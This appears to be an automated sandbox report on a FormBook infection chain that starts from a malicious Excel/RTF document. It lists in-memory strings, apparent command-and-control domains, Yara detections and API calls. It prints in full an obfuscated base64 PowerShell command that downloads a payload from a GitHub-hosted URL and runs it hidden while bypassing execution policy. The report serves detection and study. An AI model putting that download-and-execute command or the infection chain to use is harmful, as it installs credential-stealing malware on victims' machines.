Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lefeetlab.net
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lefeetlab.net/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lefeetlab.net/gwdv/www.dental-implants-84866.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lefeetlab.netReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lingerie-16071.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lingerie-16071.bond/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lingerie-16071.bond/gwdv/www.accountingcourse06.shop
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lingerie-16071.bondReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lmodt.info
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lmodt.info/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lmodt.info/gwdv/www.divineworks.store
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lmodt.infoReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.my-tournament.live
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.my-tournament.live/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.my-tournament.live/gwdv/www.senior-dating-73474.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.my-tournament.liveReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nasocnite.xyz
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nasocnite.xyz/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nasocnite.xyz/gwdv/P
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nasocnite.xyzReferer:
Source: explorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleane
Source: explorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.senior-dating-73474.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.senior-dating-73474.bond/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.senior-dating-73474.bond/gwdv/www.lmodt.info
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.senior-dating-73474.bondReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.spanish-classes-13883.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.spanish-classes-13883.bond/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.spanish-classes-13883.bond/gwdv/www.intelliflow.run
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.spanish-classes-13883.bondReferer:
Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: m2g.me.url.4.dr String found in binary or memory: https://m2g.me/
Source: PO.78NO9.xls, a080.url.4.dr String found in binary or memory: https://m2g.me/a080
Source: FC830000.0.dr, ~DF8B1FFFD9F6395A18.TMP.0.dr String found in binary or memory: https://m2g.me/a080yX
Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 0000000F.00000002.481286410.00000000025CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfXh;
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0090AC37 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject, 27_2_0090AC37

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.638758536.0000000006123000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 2660, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1368, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 2452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3760, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mstsc.exe PID: 4060, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Excel sheet contains many unusual embedded objects
Source: PO.78NO9.xls OLE: Microsoft Excel 2007+
Source: PO.78NO9.xls OLE: Microsoft Excel 2007+
Source: FC830000.0.dr OLE: Microsoft Excel 2007+
Source: FC830000.0.dr OLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a080.url Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\m2g.me.url Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Memory allocated: 770B0000 page execute and read and write
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F00C4 NtCreateFile,LdrInitializeThunk, 22_2_009F00C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F0048 NtProtectVirtualMemory,LdrInitializeThunk, 22_2_009F0048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F0078 NtResumeThread,LdrInitializeThunk, 22_2_009F0078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EF9F0 NtClose,LdrInitializeThunk, 22_2_009EF9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EF900 NtReadFile,LdrInitializeThunk, 22_2_009EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 22_2_009EFAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 22_2_009EFAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk, 22_2_009EFBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 22_2_009EFB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFC90 NtUnmapViewOfSection,LdrInitializeThunk, 22_2_009EFC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk, 22_2_009EFC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFD8C NtDelayExecution,LdrInitializeThunk, 22_2_009EFD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 22_2_009EFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFEA0 NtReadVirtualMemory,LdrInitializeThunk, 22_2_009EFEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 22_2_009EFED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFFB4 NtCreateSection,LdrInitializeThunk, 22_2_009EFFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F0060 NtQuerySection, 22_2_009F0060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F01D4 NtSetValueKey, 22_2_009F01D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F010C NtOpenDirectoryObject, 22_2_009F010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F07AC NtCreateMutant, 22_2_009F07AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F0C40 NtGetContextThread, 22_2_009F0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F10D0 NtOpenProcessToken, 22_2_009F10D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F1148 NtOpenThread, 22_2_009F1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EF8CC NtWaitForSingleObject, 22_2_009EF8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EF938 NtWriteFile, 22_2_009EF938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F1930 NtSetContextThread, 22_2_009F1930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFAB8 NtQueryValueKey, 22_2_009EFAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFA20 NtQueryInformationFile, 22_2_009EFA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFA50 NtEnumerateValueKey, 22_2_009EFA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFBE8 NtQueryVirtualMemory, 22_2_009EFBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFB50 NtCreateKey, 22_2_009EFB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFC30 NtOpenProcess, 22_2_009EFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFC48 NtSetInformationFile, 22_2_009EFC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009F1D80 NtSuspendThread, 22_2_009F1D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFD5C NtEnumerateKey, 22_2_009EFD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFE24 NtWriteVirtualMemory, 22_2_009EFE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFFFC NtCreateProcessEx, 22_2_009EFFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009EFF34 NtQueueApcThread, 22_2_009EFF34
Source: C:\Windows\explorer.exe Code function: 23_2_0610CE12 NtProtectVirtualMemory, 23_2_0610CE12
Source: C:\Windows\explorer.exe Code function: 23_2_0610B232 NtCreateFile, 23_2_0610B232
